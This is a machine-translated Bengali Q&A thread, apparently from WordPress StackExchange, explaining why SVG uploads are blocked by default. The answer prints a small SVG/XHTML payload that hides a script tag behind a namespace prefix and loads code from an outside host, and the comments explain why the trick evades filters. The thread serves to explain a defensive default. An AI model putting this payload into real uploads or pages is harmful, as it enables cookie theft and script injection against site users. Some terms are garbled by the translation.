নিরাপত্তাজনিত কারণে কি মিডিয়া আপলোডারটিতে এসএমএক্স অবরুদ্ধ রয়েছে?


15

আমি দেখতে পাচ্ছি যে মিডিয়া আপলোডারে এসভিজিগুলি ডিফল্টরূপে অবরুদ্ধ রয়েছে এবং আপনাকে এগুলি ফাংশন.এফপিকে একটি সমর্থিত এমআইএমআই টাইপ হিসাবে যুক্ত করতে হবে। এর পিছনে কোন সুরক্ষার কারণ রয়েছে?

উত্তর:


17

এসভিজিতে জাভাস্ক্রিপ্ট থাকতে পারে । জাভাস্ক্রিপ্ট কুকিজ হাইজ্যাক করতে বা অন্যান্য সন্দেহজনক ক্রিয়া করতে ব্যবহৃত হতে পারে । এমনকি নামস্থানগুলিতে এটি "লুকানো "ও হতে পারে:

<html xmlns="http://www.w3.org/1999/xhtml">
   <ø:script src="//0x.lv/" />
</html>

সূত্র

এটি আপলোডের সময় ফিল্টার করা খুব শক্ত, সুতরাং এটি কেবল ডিফল্টরূপে অনুমোদিত নয়।


আমি ভেবেছিলাম নামের স্থানের বিন্দুটি ট্যাগ নামের সংঘর্ষ এড়ানোর জন্য, যার অর্থ ø:scriptহ্যান্ডেল করা উচিত নয় scriptএবং এভাবে কিছুই করা উচিত নয়। নেমস্পিড ø:scriptট্যাগটি কী কারণে নামহীন গতির ট্যাগ হিসাবে বিবেচিত হবে script? অথবা এসভিজিগুলি নন-জেএস এক্সএমএল পার্সারগুলি এম্বেড করার অনুমতি দেয়?
জ্যাব

@ জ্যাব নেমস্পেস http://www.w3.org/1999/xhtmlএই স্ক্রিপ্টটিকে একটি নিয়মিত স্ক্রিপ্টের সমতুল্য করে তোলে।
ফুসিয়া

ওহ, এখন আমি বুঝতে পারি। এইচটিএমএল ট্যাগগুলির জন্য অন্তর্নিহিত নেমস্পেসটি হ'ল http://www.w3.org/1999/xhtmlতাই আপনি সেই ইউআরএলটির একটি রেফারেন্স তৈরি করতে পারেন এবং এ জাতীয় ট্যাগগুলির জন্য নেমস্পেস উপসর্গ হিসাবে ব্যবহার করতে পারেন এবং এক্সএইচটিএমএল পার্সারগুলি এটিকে সাধারণ ট্যাগ হিসাবে পরিচালনা করবে।
জ্যাব
আমাদের সাইট ব্যবহার করে, আপনি স্বীকার করেছেন যে আপনি আমাদের কুকি নীতি এবং গোপনীয়তা নীতিটি পড়েছেন এবং বুঝতে পেরেছেন ।
Licensed under cc by-sa 3.0 with attribution required.